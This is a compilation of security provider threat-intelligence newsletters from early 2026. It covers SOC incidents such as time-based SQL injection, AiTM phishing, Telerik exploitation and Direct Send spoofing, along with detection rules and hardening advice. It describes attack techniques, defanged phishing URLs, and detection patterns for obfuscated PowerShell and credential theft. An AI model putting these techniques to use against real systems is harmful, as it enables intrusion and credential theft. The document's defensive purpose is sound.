Time-Based SQL Injection on Public Facing Website

Detection: SOC detected Time-Based SQL Injection on Public-Facing Website of a customer in financial services.

Description: The public-facing application was vulnerable to time-based SQL injection, allowing attackers to manipulate backend database queries. By introducing deliberate delays, attackers could confirm vulnerabilities and potentially extract sensitive data over time. No confirmed data exfiltration was observed during detection.

Attackers crafted malicious payloads (e.g., using conditional statements with delay functions such as PG_SLEEP) within input parameters to manipulate SQL queries.

Timely detection of the incident prevented exfiltration and potential impact on the website.

Recommendations: Adopt secure coding practices such as parameterized queries and strict input validation to prevent injection attacks. Enhance log monitoring with regex-based detection and deploy a WAF to block malicious payloads. Regular security testing and least privilege access to databases should be enforced.

Direct Send Email Abuse Resulting in Suspicious Sign-In and User Compromise

Detection: Use Case generated for risky sign-in from M365 defender which identified anomalous AiTM sign-in activity from an unusual geographic location shortly after the user received a suspicious email. Email logs confirmed the message bypassed traditional authentication checks using direct send methods.

Description: A user account was compromised following interaction with a malicious email delivered via a direct send configuration. This method allowed the attacker to send emails that appeared legitimate without passing through standard email authentication controls (e.g., SPF/DKIM/DMARC enforcement).

The user engaged with the email, leading to credential exposure. Shortly after, a suspicious sign-in was detected from an unrecognized location/device, indicating unauthorized access.

Recommendations: Restrict or disable direct send functionality and enforce strong email authentication mechanisms such as SPF, DKIM, and DMARC. Implement MFA and conditional access policies to reduce unauthorized access risks. Regular user awareness training and monitoring of anomalous sign-in activity are essential.

Threat Detection Engineering

New Detections for this Month

Linux: Shadow File Direct Modification Detected (P3)

This detection identifies suspicious attempts to directly modify the /etc/shadow file on Linux systems using command-line utilities such as sed, echo, tee, cp, or mv. The /etc/shadow file stores hashed passwords and is highly sensitive; direct manipulation is a strong indicator of unauthorized privilege escalation, credential tampering, or persistence mechanisms.

Security Impact:

• Detects unauthorized credential manipulation attempts
• Helps prevent privilege escalation and persistence via password changes
• Enhances visibility into critical system file tampering on Linux systems

Detection Name: Global: Audit and Compliance: Shadow File Direct Modification Detection.

Global Administrator Elevation to Azure Subscription Owner (P3)

Detect instances where a Global Administrator elevates their privileges to become an Azure Subscription Owner, which grants full control over all resources within the subscription. This action is highly sensitive and may indicate privilege escalation, misuse of administrative rights, or potential account compromise.

Security Impact:

• Full administrative control over Azure subscription
• Ability to:
  • Modify or delete resources
  • Grant permissions to other users

Detection Name: Global: Audit and Compliance: Global Administrator Elevation to Azure Subscription Owner

Threat Management

SecurityHQ’ s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights.

From ClickFix to Credentials Theft: Defeating the Latest Stealer & Loader Tactics

What is Stealer :

An information stealer is malware designed to silently harvest sensitive data from an infected endpoint browser-saved credentials, session cookies, crypto wallets, VPN configs, RDP files, and autofill data. It exfiltrates everything to an attacker-controlled server, typically within seconds of execution, then deletes itself. No persistence is required because the damage is done immediately.

What is a Loader :

A loader is malware whose sole purpose is to establish a foothold on a victim machine and silently fetch and execute a secondary payload a stealer, ransomware, RAT, or banking trojan. Loaders are intentionally lightweight and heavily obfuscated to bypass AV and EDR. They are typically the first stage in a multi-phase attack chain.

SecurityHQ Recommendations:

Method 1. Configure Attack Surface Reduction rules and credential protection in MDE

The following ASR policies directly target the delivery chains and execution techniques used by stealers and loaders including LOLBin abuse, script execution, and LSASS credential access.

security.microsoft.com → Settings → Endpoints → Attack surface reduction rules

Method 2. Enable Credentials Guard and LSASS protection

Enable the following MDE options from MDE and Intune for Credential Guard and LSASS protection.

Configure CrowdStrike Falcon prevention policy and IOA rules for stealer and loader detection

Configure prevention policy – Credential theft and LOLBin protections

Falcon Console → Endpoint Security → Prevention Policies → [Custome Policy].

Threat Hunting

SecurityHQ’ s Threat Hunting team conducted hunts focused on general endpoint activities seen in the customer’s environment. Following section highlights hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

An adversary may be operating on one or more endpoints by abusing legitimate system processes and native operating system functionality to establish persistence, perform internal reconnaissance, and exfiltrate data in a low-noise manner.

These activities are designed to evade traditional signature-based detections and can be identified through behavioral anomalies observed in process execution, registry modifications, service creation, and network telemetry collected via EDR.

Context:

This threat hunt focuses on detecting stealthy adversarial behavior that leverages trusted system binaries and native OS utilities (Living-off-the-Land techniques) to bypass conventional security controls.

Attackers increasingly avoid dropping obvious malware and instead rely on:

• Legitimate tools such as PowerShell, CMD, WMIC, and system services
• Execution from user-writable directories (e.g., AppData, Temp, Downloads)
• Native persistence mechanisms (registry keys, services)
• Low-frequency, high-evasion data exfiltration methods

Because these techniques blend with normal administrative activity, detection requires behavioral analysis and anomaly-based hunting rather than reliance on static signatures.

The investigation analyzes:

• Process execution patterns and command-line behavior
• Registry modifications associated with persistence
• Service installation activity
• Endpoint reconnaissance indicators
• Outbound network communication patterns
• Use of obfuscation in command execution

The goal is to identify early-stage compromise, persistence establishment, and potential data exfiltration while minimizing false positives through contextual filtering and baselining.

Threat Hunting Approaches:

1. Execution & Persistence Abuse Detection

Analyze execution of trusted system binaries (e.g., PowerShell, CMD, WMIC, svchost) from non-standard or user-writable paths, along with monitoring:

• Suspicious service creation
• Registry persistence (Run keys, Winlogon, IFEO, SilentProcessExit)

These behaviours indicate living-off-the-land abuse and persistence establishment.

2. Behavioral & Command Execution Analysis

Identify anomalous process behaviour such as:

• High-frequency reconnaissance commands (whoami, net user, nltest, ipconfig)
• Obfuscated or encoded command execution (-enc, iex, Base64)
• Unusual parent-child process relationships

These patterns help detect stealthy attacker activity and defense evasion techniques.

3. Network & Exfiltration Activity Monitoring

Monitor outbound network activity to detect:

• Connections to rare or unapproved file-sharing domains
• Non-browser processes initiating external communication
• Low-frequency or beacon-like traffic patterns

Correlate process and network telemetry to uncover data exfiltration and command-and-control activity.

Recommendations: Based on the observed threat landscape, the following actions are recommended:

• Enable Constrained Language Mode for non-admin users.
• Block Powershell executions from Non admin users or restrict executions for Encoded Commands and Invoke-Expressions
• Restrict script execution from user-writable directories like %AppData% %Temp% %Downloads% %Public% and apply tighter PowerShell policies for non-admin users.
• Eliminate or strictly restrict internet-exposed authentication services, especially SMB.
• Block non-Admin modification of Registry like HKCU\..\Run or HKLM\..\Run.
• Restrict Registry Storage of Network Configurations Registry values containing IP:Port patterns
• Block .ps1, .vbs, .js from email and web
• Enforce outbound filtering for non-browser processes
• Restrict communication towards filesharing cloud domains that are not approved by the organization.

Incident Response – Success Story

Time-Based SQL Injection Attempt

Overview

SecurityHQ SOC identified a Time-Based SQL Injection attempt targeting a public-facing web application belonging to a financial services customer. Immediate major incident management call was setup with key stakeholders and Incident response

The attack leveraged database delay functions to probe backend query execution behavior, indicating an attempt to validate input handling weaknesses and potentially extract sensitive data.

Early detection and response ensured that the activity was contained before any confirmed data exfiltration or service disruption occurred.

What Happened

During routine monitoring, the SOC detected anomalous web application requests containing crafted SQL payloads designed to manipulate backend database queries.

The attacker utilized time-based techniques, specifically injecting conditional logic combined with delay functions (e.g., PG_SLEEP), to observe response timing differences. This method allows attackers to infer database responses without directly retrieving data.

Key observations:

• Malicious payloads embedded within application input parameters
• Repeated requests introducing intentional delays to validate vulnerability
• Indicators consistent with blind SQL injection techniques
• No evidence of successful data extraction or lateral movement

The activity suggests that the attacker was in the reconnaissance and validation phase, attempting to confirm exploitability before proceeding to data extraction.

Threat Actor Attribution (Assessment):

At this stage, there is no direct attribution to a specific threat group.

However, the observed techniques align with Opportunistic attackers or automated scanning tools targeting publicly exposed applications

SecurityHQ IR team successfully responded to the incident thereby limiting the impact, and carried out necessary response actions including hardening of existing security controls to prevent future reocurrences.

Here are key Strategic Controls that can prevent similar incidents in your environment:

• Implement parameterized queries / prepared statements to eliminate SQL injection risks.
• Enforce strict input validation and sanitization across all user inputs.
• Conduct regular secure code reviews.
• Deploy regex-based detection rules to identify SQL injection patterns.
• Perform regular vulnerability assessments and penetration testing (VAPT).

Authors

The post Managed Defense Threat Insights: March 2026 Newsletter appeared first on SecurityHQ.

Exposed Virtual Machine on Azure was enumerated by attackers

Detection: Use Case generated for login attempts from “non-compliant” host as well as Login failure for high privileged account”KRBTGT”

Description: Threat actors have been observed actively scanning the internet for exposed hosts by targeting port 3389. Once such hosts are identified, they attempt brute-force attacks using commonly used generic accounts, including highly privileged accounts such as KRBTGT.

Through early detection of brute-force activity and identification of a non-compliant host, the team was able to locate the exposed system and validate its exposure using OSINT platforms.

Recommendations: It is recommended to block Inbound Port 3389 communication across all perimeter boundaries and NSGs. Please verify that no production VMs have publicly exposed to management ports. Authentication controls should be strengthened by implementing account lockout thresholds, enforcing strong password policies, and disabling unused local accounts.

Abuse of Legitimate Services (Box and Trello) for Phishing and Malicious Document Distribution

Detection: SOC identified potential account takeover activity and suspicious inbox rule creation.

Description: Multiple users received emails inviting them to collaborate on Box. When users clicked the link, they were prompted to reset their passwords. Subsequently, a file was presented on Box which, when accessed, redirected users to a page requesting Microsoft credentials.

Through this technique, the attacker gained access to user email accounts. The attacker then read and downloaded multiple emails and created inbox rules to automatically move emails with subjects containing the keyword “Box” to the “Conversation History” folder and mark them as read, thereby hiding the activity from users. This was followed by additional phishing emails requesting collaboration on different Box files, indicating lateral phishing attempts.

A new tactic observed during this phishing campaign involved the attacker uploading malicious files to SharePoint, leveraging trusted internal platforms to propagate the attack within the organization.

A similar phishing trend has also been observed using the Trello platform, suggesting abuse of multiple legitimate collaboration services to bypass user suspicion and security controls.

Recommendations: Enforce MFA for all user. Ensure conditional access policies covering MFA for all orgnisation users. Regularly review and audit mailbox rules. Conduct periodic user awareness training focused on collaboration-based phishing

Threat Detection Engineering

New Detections for this Month

Behavior Analytics Detection for User

This detection leverages MS Sentinel’s Behavior Analytics insights to identify high-risk authentication anomalies where a user logs in for the first time from a new country, uses a new browser, and accesses an application for the first time without a registered device context.

Security Impact:

• Detects potential account takeover attempts
• Identifies suspicious login behavior
• Flags reconnaissance using compromised credentials

Detection Name: Authentication: Behavior Analytics Detection for User.

OAuth Device Code Flow Abuse Detection

This detection identifies suspicious use of OAuth Device Code authentication flow where no device ID is recorded, and Microsoft Graph is accessed. Device Code Flow is often abused in phishing campaigns, token theft, and consent grant abuse scenarios.

Security Impact:

• Detects OAuth abuse techniques
• Helps prevent token-based account compromise
• Enhances visibility into API-based access misuse

Detection Name: Authentication: OAuth Device Code Flow Abuse Detection.

MSXDR: Lotus Blossom Suspicious Network Connection

This detection monitors suspicious outbound network connections initiated by gup.exe to non-approved external URLs and public IP addresses. Events are enriched with geolocation context to enhance investigation.

Security Impact:

• Identifies Command-and-Control (C2) communications
• Detects malware staging activity
• Flags suspicious updater abuse scenarios

Detection Name: Malware: Windows: Lotus Blossom: Suspicious Network Connection Detected.

Windows Suspicious Binary Spawning

This detection identifies suspicious process spawning behavior initiated by gup.exe, excluding known legitimate processes. It correlates unique SHA256 hashes with network activity to detect advanced execution chains.

Security Impact:

• Detects malware execution chains
• Identifies secondary payload execution
• Enhances detection of persistence mechanisms

Detection Name: Malware: Windows: Suspicious Binary Spawning Detected.

Threat Management

SecurityHQ’ s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights.

Attackers Abuse Microsoft 365 Direct Send to Deliver Internal Phishing Emails

What is Direct Sent :

Direct Send is a Microsoft 365 (Exchange Online) feature that allows applications, printers, multi-function devices, and line-of-business systems to send email by connecting directly to Exchange Online over SMTP. Unlike authenticated SMTP (SMTP AUTH), Direct Send does not require a username or password it relies solely on the sender’s IP address being permitted.

Microsoft officially supports this method as a low-friction approach for on-premises devices and legacy applications that need to send alerts, notifications, or reports. The feature works by routing SMTP traffic directly to an organisation’s Exchange Online MX endpoint.

How Attackers Exploit Direct Sent :

When an attacker obtains or identifies a target organisation’s MX record (publicly available via DNS), they can abuse Direct Send to relay spoofed emails through Microsoft’s own Exchange Online infrastructure. Because no authentication is required, the attacker can set any “From” address including legitimate internal employee addresses making the email appear to originate from inside the organisation.

SecurityHQ Recommendations:

Method 1. Configure Anti-Spoofing Policy in Microsoft Defender

• Navigate to Microsoft Defender Portal (security.microsoft.com) > Email & Collaboration > Policies & Rules > Threat policies
• Select Anti-phishing and click the default policy or create a new policy
• Under ‘Spoof’ settings, ensure ‘Enable spoof intelligence’ is toggled On
• Set ‘If message is detected as spoof’ to Quarantine or Move to Junk (recommended: Quarantine for high-  risk senders)
• Save and apply the policy to all users or targeted groups

Method 2. Create a Transport Rule on Exchange Online

Example Conditions

• Sender is located outside the organization
• Sender’s domain matches your internal domain (e.g @yourcompany.com)

Actions: Quarantine the message

Exceptions:

• If the message is received from a specific IP range or any inbound connector (your third-party filtering service) configured in your environment.
• If the sender is a known service account or relay

Additional Settings:

• Audit this rule for visibility in message trace and reporting
• Enable rule mode: Enforce (not test mode)

Threat Hunting

SecurityHQ’ s Threat Hunting team conducted hunts focused on general account activities seen in the customer’s environment. Following section highlights hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

A trusted software update mechanism for Notepad++ (gup.exe) may have been abused to deliver or execute unauthorized code, where the updater-initiated network connections to unexpected external destinations, downloaded or dropped untrusted binaries, spawned anomalous child processes, and potentially established follow-on network communication indicative of command-and-control or secondary payload execution.

Context:

The threat hunt focused on identifying indicators of potential abuse of the Notepad++ update mechanism, specifically examining whether the trusted updater process (GUP.exe) was leveraged to execute unauthorized code, establish persistence, or initiate malicious outbound communication. Because software update utilities are inherently trusted and commonly allowed through security controls, their misuse can enable stealthy execution with reduced user suspicion.

The investigation analyzed process execution chains, child process spawning behavior, outbound network connections, file creation and modification events, DLL loading activity, and security control telemetry across the environment. Attention was given to deviations from expected update workflows, including connections to non-standard domains, execution of binaries from user-writable directories, anomalous process lineage, and network activity originating from updater-spawned processes. The hunt emphasized behavioral inconsistencies rather than reliance on static malware signatures.

Indicators such as abnormal execution chains originating from notepad++.exe, GUP.exe spawning unexpected child processes, connections to unapproved or high-risk external infrastructure, suspicious DLL side-loading patterns, and file drops outside standard installation paths may collectively suggest exploitation of the update mechanism as an initial access or proxy execution vector. These behaviors align with software supply chain abuse, trusted binary proxy execution, and early-stage command-and-control establishment, warranting deeper investigation and validation of application control, network filtering, and update integrity controls.

Threat Hunting Approaches

• Execution chain integrity analysis across endpoints:
  Process lineage was reviewed to validate expected parent-child relationships originating from Notepad++ and its updater component (GUP.exe). Focus was placed on identifying deviations from the normal execution flow (notepad++.exe → gup.exe → update.exe), as abnormal branching into scripting engines, system utilities, or unrelated executables may indicate proxy execution under a trusted application context and potential compromise of the update workflow.
• Compromised update traffic monitoring:
  Outbound network connections initiated by GUP.exe were analyzed to determine whether update traffic resolved to legitimate and historically observed infrastructure. Connections to non-whitelisted domains, direct IP-based communication, anomalous geolocations, or newly observed external destinations were reviewed, as manipulation of update traffic can enable delivery of unauthorized payloads while blending into legitimate HTTPS activity.
• Unauthorized child process spawning behavior:
  All processes spawned by GUP.exe were evaluated to detect execution of command interpreters, living-off-the-land binaries (LOLBins), or executables launched from user-writable directories. Since update utilities should execute only controlled installer components, deviations from expected child process behavior may signal abuse of the updater as an execution proxy for malicious code.
• Network activity originating from spawned binaries:
  Network telemetry associated with binaries launched by GUP.exe was correlated to identify potential secondary payload retrieval or command-and-control communication. Non-browser processes initiating outbound HTTPS sessions, repeated beacon-like intervals, or communication over uncommon ports were examined, as these behaviors may represent post-exploitation activity following initial execution.
• Suspicious file creation and modification review:
  File system events triggered by GUP.exe were analyzed to identify executable or DLL drops outside standard installation directories. Attention was given to files written to AppData, Temp, ProgramData, or other user-controlled paths, as such locations are commonly used for staging payloads or establishing persistence. File creation events immediately followed by execution were treated as elevated risk indicators.
• Security control telemetry correlation:
  Endpoint protection and application control logs were reviewed to determine whether update-related activity triggered antivirus detections, execution blocks, or policy enforcement events. These signals provide insight into attempted abuse, even when controls successfully prevent full execution, and help differentiate benign update behavior from blocked malicious activity.
• Known IoC and hash validation:
  Network destinations and file hashes associated with update activity were cross-referenced against known threat intelligence indicators. Matches to known malicious domains, IP addresses, or SHA256 values were treated as high-confidence compromise signals. Even in the absence of direct matches, behavioral anomalies were assessed to account for potentially novel or modified infrastructure used by adversaries.

Recommendations: Based on the observed threat landscape, the following actions are recommended:

• Validate and Standardize Notepad++ Installations
• Identify all endpoints with Notepad++ installed, including version and installation path.
• Verify that all instances are running the latest official, patched version obtained from trusted sources (official Notepad++ site or verified GitHub releases).
• Replace or reinstall any instances where:
  • Version is outdated or unsupported
  • Installation source cannot be validated
  • Binary Hashes do not match known-good releases
• Restrict plugin installation to approved plugins only.
• Remove unused or legacy plugins that may introduce additional risk.
• Remove Notepad++ from systems where it is not business-justified.

Incident Response – Success Story

Illicit OAuth App Consent Phishing

Overview

An Illicit OAuth App Consent phishing attack targeted the user [email protected] (anonymized name), leveraging an Adversary-in-the-Middle (AiTM) technique to capture an active authentication session. SecurityHQ IR team was involved in this incident in a later stages of the attack. The compromise resulted in unauthorized access to Microsoft 365 services, MFA manipulation, and mailbox data enumeration. Incident response ensured that the impact was limited and policies were hardened to prevent similar incidents.

What Happened
The attack began when the user clicked a malicious URL embedded in a phishing email.

Upon clicking the link:

• The user was initially redirected through legitimate security gateways:
  • Outlook Safelink
  • Microsoft SmartScreen
  • Mimecast Protection
• Despite multiple security warnings, the user manually overrode all warning pages.
• After bypassing the protections, the user was redirected through the following malicious infrastructure chain:
  • hxxps[:]//raspy-sea-7139[.]sadiri1121-7b0[.]workers[.]dev
  • cforca[.]group
  • challenges[.]cloudflare[.]com
  • autologon[.]microsoftazuread-sso[.]com

All redirections occurred within an active Microsoft Edge (msedge) session on the host.

Because the user already had an authenticated Microsoft session in the browser, the phishing infrastructure was able to intercept and capture the authentication session token — successfully executing an Adversary-in-the-Middle (AiTM) attack.

To maintain persistence, the attacker:

• Reused the same session ID
• Accessed:
  • OfficeHone
  • My Profile
  • My Sign-ins
  • One Outlook Web
• Added a new MFA device labeled “NO_DEVICE”

Threat Actor Attribution (Assessment):

The infrastructure and attack pattern strongly align with modern AiTM phishing kits such as:

• Evilginx-style reverse proxy frameworks
• OAuth token harvesting phishing campaigns
• Cloudflare Workers–hosted phishing redirectors
• Use of:
  • Cloudflare challenge pages
  • Azure AD SSO lookalike domains
  • Malicious SharePoint-themed phishing landing page
  • Session replay activity post-authentication

This suggests an organized phishing-as-a-service (PhaaS) operation rather than a targeted state-sponsored campaign. Attribution remains financially motivated cybercriminal activity leveraging AiTM phishing infrastructure.

SecurityHQ IR team successfully responded to the incident thereby limiting the impact, and carried out necessary response actions including hardening of existing security controls to prevent future reocurrences.

Here are key Strategic Controls that can prevent similar incidents in your environment:

• Enable token protection policies
• Restrict MFA device registration
• Implement impossible travel detection tuning
• Deploy Defender for Cloud Apps session control
• Monitor for AiTM indicators (reverse proxy patterns, Cloudflare Worker abuse)

Authors

The post Managed Defense Threat Insights: February 2026 Newsletter appeared first on SecurityHQ.

Critical IIS Server Compromise via Telerik Web UI Vulnerability

Detection: Use Case generated for usage of certutil to download payload on affected server.  

Description: Threat actors have been seen actively attacking vulnerable IIS servers by taking use of a known vulnerability in Telerik UI for ASP.NET AJAX, which is tracked as CVE-2019-18935. The exploit makes use of the endpoint’s unsafe deserialization. 

Attackers can upload and run any code on the compromised IIS server by taking advantage of this vulnerability, which results in remote code execution (RCE). Adversaries can obtain an initial foothold, launch web shells, carry out malicious payloads, and possibly move laterally inside the environment if exploitation is successful.
In observed incident, threat actors abused the vulnerable WebResource.axd handler to bypass authentication controls and execute malicious commands under the context of the IIS application pool. This often resulted in persistent access, unauthorized file uploads, and follow-on activity such as credential harvesting or deployment of additional malware.

Recommendations: To strengthen the overall security posture, SecurityHQ IR team recommended Immediately patch Telerik UI to a fixed version provided by the vendor. The team provided all available Indicators of Compromise (hashes) to be blocked in Trend Micro and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in other EDR tools.

Lessons Learnt: Organizations should patch unpatched critical vulnerabilitites immediately. IIS web servers hosting public applications are attractive targets for attackers. Third-Party Components Require the Same Patch Discipline as OS Updates. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

SharePoint & E-Signing Phishing Emails Impersonate Trusted Services to Steal Credentials

Detection: Client reported possible BEC attack due to suspicious email sent to vendors with SOC monitoring handled by other MSSP.

Description: The attackers impersonated widely used file-sharing and electronic signature services, including SharePoint and e-signing platforms, crafting emails that closely mimicked legitimate notifications — complete with official-looking logos, headers, and “Review Document” buttons — to increase authenticity.

To evade detection and increase trust, all malicious links were routed through trusted redirect services (most commonly Mimecast’s secure-link rewriting domain), making the URLs appear legitimate to both users and automated filtering systems.
The campaign primarily impacted sectors that routinely exchange contracts and financial documents — including consulting, technology, construction/real estate, healthcare, finance, manufacturing, media/marketing, transportation/logistics, energy, education, retail, hospitality/travel, and government — underscoring the effectiveness of this social engineering technique at scale.

Recommendations: Enforcing secured MFA methods for authentication instead of Text or Call methods. Revoking all active sessions and password reset for affected users. Lastly, user awareness and phishing training were suggested to all end users.

Lessons Learnt: Impersonation policy between sister companies wasn’t in place, bypassing users and automated filters. Multi-layered defenses, including MFA, email security controls, and user awareness, are essential to reduce compromise risk.

Threat Detection Engineering

New Detections for this Month

Use Case generated for usage of certutil to download payload on affected server led to identification of potential vulnerability exploitation associated with Telerik that led Threat Detection Engineering team to create specific detection use cases as below:

Telerik Exploitation

This detection identifies potential exploitation of vulnerabilities in Telerik UI for ASP.NET through malicious POST requests to the WebResource endpoint, often abusing the type=rau parameter to upload malicious files or trigger unsafe deserialization.
Successful exploitation may lead to remote code execution, deployment of web shells, persistent unauthorized access, lateral movement within the network, and potential exposure of sensitive data, making early detection critical to preventing full server compromise and operational disruption.

Detection Name: (AUTO) Global: Exploit: Telerik Exploitation Attempt Detected (P2)

Telerik exploitation is almost always visible at the web layer first. Use case allows us to detect the exploit attempt, validate success, and trace the full attack path from HTTP request to system compromise

Deserialization of Untrusted Data vulnerability in Sitecore Experience Manager (XM)

CVE-2025-53690 is a critical security vulnerability affecting multiple Sitecore products, including Sitecore Experience Manager (XM), Experience Platform (XP), and related components through version 9.0. It stems from a deserialization of untrusted data flaw that allows attackers to execute arbitrary code remotely.

This vulnerability occurs when Sitecore improperly handles serialized .NET objects—specifically via ViewState deserialization allowing maliciously crafted inputs to be deserialized in a way that results in remote code execution (RCE)

Detection Name: (AUTO) Global: Exploit: Deserialization in Sitecore Experience Manager Detected (P3)

Sitecore’s Security Bulletin SC2025-005 — primary vendor guidance with patch and mitigation instructions. Reference: https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003865

Threat Management

SecurityHQ’ s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights.

Malware Campaign Leveraging Fake PDF Applications

Since November 2025, a widespread malware campaign has been observed targeting organizations through trojanized PDF editor applications. Truesec has identified several malicious programs most notably ConvertMate, PDFClick, and PDFSkillsApp that impersonate legitimate PDF utilities while serving as initial access vectors for malware delivery.

These applications are distributed via attacker-controlled domains promoted through online advertisements. Upon installation, the malware executes a multi-stage infection chain, including outbound network communications, host reconnaissance, and persistence mechanisms. Persistence is achieved through scheduled tasks configured to execute at 24-hour intervals. The malware subsequently communicates with hardcoded command-and-control (C2) infrastructure, enabling long-term access and follow-on malicious activity.

Internal Incident Summary :
Our SOC observed a confirmed incident, when Windows Defender for Endpoint detected and blocked the malicious file “UpdateRetreiver.exe” (categorized as ‘Malgent’ malware). The file hash matched Truesec’s published indicators of compromise, confirming the infection originated from the ConvertMate application installed in the user’s AppData directory. Following established incident response procedures, the affected host was isolated, and remediation steps including system re-installation and credential resets were initiated. As a reminder to all staff: exercise caution when downloading software particularly free PDF tools advertised online and always verify applications through official channels before installation.

SecurityHQ Recommendation: Strengthen Third-Party Application Controls

In response to this ongoing threat, SecurityHQ strongly recommends hardening your third-party application usage policy to block or control unauthorized software within your environment. Implementing application control significantly improves your security posture by preventing users from installing potentially malicious utilities. Organizations can leverage Windows AppLocker for on-premises control or Microsoft Defender Cloud Apps Policy for cloud-based management.

Steps to Block 3rd pary PDF edditors using Cloud Apps Policy :

Method 1. Block from Cloud App Catalog

• In Microsoft Defender Portal, navigate to Cloud Apps → Cloud app catalog
• Search for the application you want to block (e.g., ConvertMate, PDFClick, and PDFSkillsApp)
• Click the three dots (⋮) at the end of the app row
• Select Unsanctioned
• The app will be automatically synced to Defender for Endpoint and blocked on managed devices

Method 2. Block from Discovered Apps

• Navigate to Cloud Apps → Cloud Discovery → Discovered apps
• Review discovered applications and their risk scores
• Click the app name to view details including users, traffic, and risk factors
• Click Unsanctioned to block the application
• Optionally, select Monitored first to track usage before blocking.

Threat Hunting

SecurityHQ’ s Threat Hunting team conducted hunts focused on general account activities seen in the customer’s environment. Following section highlights hypothesis, hunts and top actions recommended to the customers.

Hypothesis:

Unmanaged or shared endpoints are being used as an entry point to misuse valid credentials, execute unauthorized scripts, establish persistence, and potentially stage or exfiltrate data via removable media or exposed network services.
This hunt assumes that attackers (external or insider) may be living off the land, leveraging legitimate user access, common utilities, and poor endpoint controls rather than deploying overt malware.

Context:

The threat hunt focused on identifying indicators of credential misuse, unauthorized execution, and persistence attempts originating from unmanaged or shared endpoints. Such devices reduce user accountability and increase the likelihood of malicious activity remaining undetected.

The investigation analyzed authentication patterns, network exposure, script execution, download behavior, USB usage, and security control enforcement across the environment. Particular attention was given to behaviors commonly associated with initial access, post-exploitation, lateral movement, and data staging, while avoiding reliance on traditional malware signatures.

The presence of multiple users authenticating from the same endpoint, internet-exposed authentication services, execution of scripts from user-writable directories, and unrestricted file transfer via removable media suggests potential abuse of legitimate credentials and tools. These behaviors collectively align with insider threat scenarios, credential compromise, or early-stage intrusion activity, warranting deeper investigation and control validation.

Threat Hunting Approaches

• Identity behavior analysis across endpoints: Authentication patterns were reviewed to identify multiple users authenticating from the same device and non-admin users authenticating from an unusually high number of devices, as deviations from normal user-device relationships reduce accountability and increase the risk of credential misuse.
• Internet-exposed authentication monitoring: Authentication attempts originating directly from the internet were analyzed, including the use of high-risk protocols such as SMB, as externally exposed authentication services significantly increase susceptibility to brute-force attacks and unauthorized access.
• Script execution from user-controlled locations: Execution of batch and PowerShell scripts from user-writable paths such as Downloads was reviewed, as these locations are frequently abused for reconnaissance, automation, and execution of malicious logic using trusted tools.
• File download source analysis: Download activity from social media, chat platforms, freeware, cloud storage, generative AI, and foreign-hosted websites was analyzed, as these sources are commonly leveraged for delivery of trojanized tools and untrusted payloads.
• Removable media usage and file transfers: USB and external storage activity was reviewed to identify frequent connections and file transfers, as removable media remains a common vector for data staging, exfiltration, and malware introduction outside network visibility.
• Security control interaction analysis: Attack Surface Reduction rule telemetry was analyzed to identify blocked or attempted risky behaviors, as these events often highlight early abuse attempts even when controls successfully prevent execution.

This hunt demonstrates how focusing on user behavior, execution paths, and data movement can uncover meaningful risk that may otherwise remain hidden within normal operational activity.

Recommendations: Based on the observed threat landscape, the following actions are recommended:

• Enforce conditional and device-based access controls to limit authentication from unmanaged or shared endpoints.
• Restrict script execution from user-writable directories and apply tighter PowerShell policies for non-admin users.
• Eliminate or tightly control internet-exposed authentication services, especially SMB.
• Strengthen controls and monitoring around removable media usage and bulk file transfers.
• Use ASR rule hits as proactive hunting signals rather than relying solely on alert severity.

Incident Response – Success Story

Targeted Intrusion Campaign Against Indian Financial Sector

Overview

We are monitoring a targeted cyber intrusion campaign affecting organizations in India’s Financial Services sector. The activity demonstrates advanced, manual attacker behavior and sustained access rather than opportunistic or automated attacks.

Based on observed behavior, the campaign is assessed with moderate confidence to align with China-nexus state-linked threat activity, consistent with tradecraft previously associated with APT41.

What Happened
Attackers gained access by exploiting vulnerable internet-facing web applications, primarily hosted on Microsoft IIS servers. Once inside, they established persistent, stealthy access and moved laterally across server environments.

The attackers avoided traditional malware and instead relied on legitimate system tools and commercial cloud infrastructure, allowing their activity to blend into normal operations and evade basic security controls.

Why This Matters

• High-risk sector targeting: Financial services are being deliberately selected, indicating strategic rather than criminal objectives.
• Stealth and persistence: The attackers prioritize long-term access, limiting detection and increasing potential business impact.
• Elevated access: Compromised systems often resulted in administrator-level control, increasing the risk of widespread disruption or data exposure.
• Unclear intent: No evidence of ransomware, extortion, or data leaks has been observed, suggesting intelligence gathering or strategic positioning.

Key Observations

• Use of compromised web servers as an entry point and long-term foothold
• Creation of unauthorized administrator accounts and deliberate log deletion
• Controlled movement between internal servers, avoiding noisy or indiscriminate spread
• Use of trusted cloud platforms (e.g., AWS, DigitalOcean) for command-and-control, complicating detection

Threat Actor Attribution (Assessment):

Based on the cumulative TTPs observed, this activity is assessed with moderate confidence to be associated with China-nexus advanced persistent threat operations, closely aligning with tradecraft attributed to APT41.

Attribution Rationale:

• Webshell-driven persistence on IIS servers
• Heavy reliance on LOLBins over custom malware
• Controlled lateral movement using Admin$ and SQL Server
• Credential dumping and local admin account creation
• Masquerading of binaries and log clearing
• Abuse of mainstream cloud infrastructure for C2

Attacker’s motive remains unclear: As no evidence of data encryption, extortion demands, data leakage, or underground forum disclosures has been observed to date.

Recommended Actions:

• Prioritize patching and security hardening of all internet-facing applications
• Ensure least-privilege access for web and application services
• Mandate centralized logging and monitoring, including alerts for log deletion
• Review administrative access controls, including local admin accounts and server-to-server access
• Limit outbound server connectivity to approved business destinations only
• Confirm incident response readiness, including executive escalation procedures

The post Managed Defense Threat Insights: January 2026 Newsletter appeared first on SecurityHQ.

SecurityHQ has been named a Leader for the second consecutive year in the IDC MarketScape: Middle East Managed Detection and Response 2025 Vendor Assessment. IDC’s MarketScape evaluations assess providers across service delivery, operational maturity, and technology strategy. This recognition highlights how AI driven security investigation is enabling SOCs to move from raw detection to clearer, outcome-focused response. It reflects SecurityHQ’s commitment to delivering outcomes, not just coverage.

A key focus of IDC’s 2025 assessment was evaluating AI applications, examining not just adoption but how effectively it addresses core SOC challenges.

